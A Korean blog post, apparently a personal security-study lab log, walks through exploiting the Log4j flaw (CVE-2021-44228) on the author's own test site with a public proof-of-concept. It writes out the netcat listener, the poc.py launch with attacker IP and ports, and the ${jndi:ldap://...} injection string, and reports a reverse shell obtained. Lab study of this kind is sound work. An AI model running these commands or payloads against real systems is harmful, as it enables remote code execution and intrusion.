Log4j 취약점 테스트-2
내가 직접 구축한 ldap 서버로는 테스트가 잘 되지 않아서 깃허브에 올라온 서버로 한번 테스트를 해봤다.
https://github.com/kozmer/log4j-shell-poc
GitHub - kozmer/log4j-shell-poc: A Proof-Of-Concept for the CVE-2021-44228 vulnerability.
A Proof-Of-Concept for the CVE-2021-44228 vulnerability. - GitHub - kozmer/log4j-shell-poc: A Proof-Of-Concept for the CVE-2021-44228 vulnerability.
github.com
poc.py를 실행하면 공격자용 ldap 서버를 실행시킬 수 있다.
(취약한 사이트 코드도 있어서 취약한 사이트를 실행시켜서 테스트를 할 수도 있다. 그러나 나는 내가 만든 사이트를 이용하려고 한다.)
1. 다운로드
git clone https://github.com/kozmer/log4j-shell-poc
cd log4j-shell-poc
pip3 install –r requirements.txt
실행시키기 전에 jdk1.8.0_20 폴더를 내부에 위치시켜야 한다.
나는 https://ssjune.tistory.com/150 이 때 다운로드한 java 11 버전의 jdk 폴더를 log4-shell-poc 폴더내에 jdk1.8.0_20 라는 이름으로 바꿔서 넣었다.
2. 리버스 쉘 및 ldap 서버 실행
nc –nlvp 9001
python3 poc.py —userip 10.0.2.15 --webport 8000 —lport 9001
한 곳에서는 nc 명령어로 대기를 한다.
한 곳에서는 poc.py를 실행시켰다.
${jndi:ldap://192.168.0.14:1389/a}
취약한 사이트에서 위의 입력을 하게되면...
ldap 서버에서 Exploit.class를 리턴한것으로 보인다.
해당 Exploit.class 파일로 인해 리버스 쉘이 연결되었고 ls 명령을 사용할 수 있게 되었다.
'보안공부 > 기타' 카테고리의 다른 글
Log4j 취약점 테스트-1 (0) | 2024.11.22 |
---|---|
ldap 설치 (0) | 2024.11.18 |
Log4j 설치 (0) | 2024.11.15 |
JSP 테스트 (0) | 2024.11.15 |